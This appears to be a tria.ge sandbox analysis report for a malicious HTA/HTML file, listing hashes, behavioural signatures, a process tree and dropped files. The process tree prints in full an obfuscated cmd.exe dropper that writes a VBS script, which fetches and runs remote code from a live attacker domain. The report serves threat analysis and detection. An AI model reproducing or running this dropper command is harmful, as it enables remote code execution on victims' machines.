Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

2d76ec94e8...a.html

windows7-x64

8

2d76ec94e8...a.html

windows10-2004-x64

8

Resubmissions

23/01/2024, 09:55

240123-lx88nsaaf2 8

22/01/2024, 16:15

240122-tqdr7aahc3 8

Analysis

  • max time kernel
    141s
  • max time network
    272s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/01/2024, 09:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html

  • Size

    7KB

  • MD5

    f3ab9f8fe8995462c3245f10ed76ae4f

  • SHA1

    6aa8e54760bcc9aa7402e75d7cb33011e0673f7f

  • SHA256

    2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987

  • SHA512

    68d097848803e6c9f009ee41da373b5ce1136e40c750c0c704a137ca1a11bd483dc1f06089e9eb9310b47ee7232ac6bc8ad6c302bbe064765f266efef579848b

  • SSDEEP

    192:CzHyJ1AwYaKyJ0VmW98+n6z39EPHzyKQSOOUHdLqmTlphHBLmBdexU+4ur6kUjRd:CzyJ1pROT

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1116 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /V/D/c EcHo Z5ceEsS49="." : FunctIon Tji57(H27N20):NiF24 = Array(":","t","r","c","1"):Tji57 = NiF24(H27N20):end function :: fm6fciL34 = "S"+ Tji57(3) +"rip"+ Tji57(1) + Tji57(0) + "hT"+ Tji57(1) +"ps://contdlk"+Z5ceEsS49+"bounceme"+Z5ceEsS49+"net/g1":eval("Ge"+ Tji57(1) +"Obje"+ Tji57(3)+ Tji57(1) +"(fm6fciL34)") > nul > C:\Users\Public\^dmpRBh785.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4452
        • \??\c:\windows\SysWOW64\cmd.exe
          c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"
            5⤵
            • Blocklisted process makes network request
            PID:1196
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
    1⤵
      PID:2572
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4520
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"
        1⤵
        • Blocklisted process makes network request
        PID:2492
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"
        1⤵
        • Blocklisted process makes network request
        PID:2220
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"
        1⤵
        • Blocklisted process makes network request
        PID:3512

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\085BE1489149EBA229862B6B37CD44C6
        Filesize

        503B

        MD5

        90d448a2f391f2bf12a7b35d151ce5b2

        SHA1

        3cc7700072fb2ab2629342e8721027264664353d

        SHA256

        33c0cd4442f938503fe9f29ef0014748b9f2dcf1ddd0c0c980a3cf9e412996f7

        SHA512

        b9a7941b4815d27d32187c5e25a6d90496e10ee67ec32431489e569d11bb28cbdcb5cce7b93ebe540358d81015572b87727a06656341e05c608fcb2a6eaf2d49

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
        Filesize

        717B

        MD5

        60fe01df86be2e5331b0cdbe86165686

        SHA1

        2a79f9713c3f192862ff80508062e64e8e0b29bd

        SHA256

        c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8

        SHA512

        ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        471B

        MD5

        f3990afbcdf64f1f806d1b926cf35b3d

        SHA1

        da1297f9ac1e9e9e7e78b567006e9248bfc212f7

        SHA256

        48c214dd545cc2718f7e844d699efae28f80d683340959e000bb41ad75dd6386

        SHA512

        9b5bc750b2e1038c82a93d51efe0d7dcf951ca594a62a90bac0ca1019d232afd07f9630e1ba1b609e128a9ba9c23c1ea8f1badd9e6b25f3eb591a936c89ee939

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\085BE1489149EBA229862B6B37CD44C6
        Filesize

        552B

        MD5

        e3a9ad9ac69b75150e001a4abedb47c0

        SHA1

        394b4337d367a7c062ddccf35c8e2dfff3dece3c

        SHA256

        3b882ad2e26dbfd6de12105b2396285f86ac4bd7b3c7f0b98c8721daf9ba6d6f

        SHA512

        5d6b43d9447306e7545cb0b11e56496058eeffee7fce8c877c2dc8ad139c13901b5646b3e5074d4cffb1a36e2a5c24924a22ac0a27696d018633bbe098f7df57

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
        Filesize

        192B

        MD5

        92f8ba8509c99cebe120ef711fb0a15c

        SHA1

        011ab94f430d05573a3ff95f91c82dbf04fa5429

        SHA256

        10d737e1adef6e35aa7f92ebc1f51538ee60cce3256466d1788432b01084d0aa

        SHA512

        785331ea350ae533f851b78f7ac42662c2d8a2373603d6ae15e3f745ce433f54abb9ac7782ca2b9708235c1b4185d1a74ea553ba86894e2916866aafaf2811ee

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        404B

        MD5

        debffbbe5a9ec3e80a70a8729bfb794f

        SHA1

        ef8ba66731686933c5de40c9be26894cf0bf265b

        SHA256

        604eb7dc9ea9e5a9bc2d069013ce084ac88a5103b142363ddd8186f5fef72a2f

        SHA512

        a0a67712c478f2dfa28bb3528409d81368d6a5500939eedb0663fcd62e970f7905309643289bde00a53917f755afafe7998aa54a3c5e2f01e026ee38dafec7aa

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\43O0UZKG\suggestions[1].en-US
        Filesize

        17KB

        MD5

        5a34cb996293fde2cb7a4ac89587393a

        SHA1

        3c96c993500690d1a77873cd62bc639b3a10653f

        SHA256

        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

        SHA512

        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G8X408WQ\g1[1].txt
        Filesize

        26KB

        MD5

        79b44082ac9bee1660a2e529e6497034

        SHA1

        1a687cdf1814311c4ac41dc08c5ae387785c9068

        SHA256

        999fb1cfc58112cb5e4918073a48bbfcfba2c908e28ca10e867cb37f54699661

        SHA512

        e0b3d2a17f8939e3a7567a2d37c3d5d91f226728b77499fc6e2626770295f03550df2f0a197ee211e2979ee194e0d6e8cea8b01fee34fd4c0f722af0c4f9e766

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G8X408WQ\g1[1].txt
        Filesize

        27KB

        MD5

        4ba9037d9824c60f16a03c8e845cb03e

        SHA1

        668efd3cdd4ed3676b93c78c0de5d030a5023aed

        SHA256

        bce24c89d54f41488590cbc1c7d484408406e466f6901d70730f0a1b36864e1f

        SHA512

        be7867da66a95a9193e8f0fef31a7b2a20dee3f6db1964d8bdbc2d35d67c7c513a4fd1fe5ff398052b33eb84ab397493f3d752c851be200c3c2422fc66eb3b84

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GO8BH966\g1[1].txt
        Filesize

        26KB

        MD5

        31b5e7952b619ad4da2ed1306501ad4c

        SHA1

        9fc21d985d83fc77516be614f09f59f0cf329138

        SHA256

        97fe259208d31a315d54ad36b4020f69bfbc7cb46d8eb31a74ff2eb498c08381

        SHA512

        1c77ebfa5e9587ec4bea2769ae12325d1de7076d48bdc6a8a9f5cf7534e251fb7dc4bd1540ae89806950dcffd8db000f9bbec7e0f768549d617561123bd9cd88

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VH4I14XV\g1[1].htm
        Filesize

        327B

        MD5

        fd2efbdbb30ede4f38e15e84d364f2cd

        SHA1

        7367e6401f540890d1ec7cc959d8b752cd4e6864

        SHA256

        59fe5fc6b1a92a3744bb252aa3f9cb4e925f8879b5c7783259ff322fc7b76ab8

        SHA512

        d7523eda57da0fa7c03cd0fed7c05b6c28104cdc4858a34f8c0ddc84d9ff7c2a9b431d59d3109c8a96c40b7f20fe30de6d3585ba51e363cf37a14799a2f72357

        Download Submit

      • C:\Users\Public\dmpRBh785.vbs
        Filesize

        306B

        MD5

        154b54da0532f06d78997442ad648d45

        SHA1

        1087a477ec4815eade97d338743ce63361e5f09b

        SHA256

        4f72eeaf5d050f5077a82782d7dfbceed38448b1569836f8b0550dcd3080574d

        SHA512

        64bc9c808251aa272352cef3d74620974f962fbc5d511474a8f8ea0393aa43a76a0ebf8b3877d5f3ccaa4b9c7e25c98793b0cad8928d68cc4a0a9bcc99c5fe2c

        Download Submit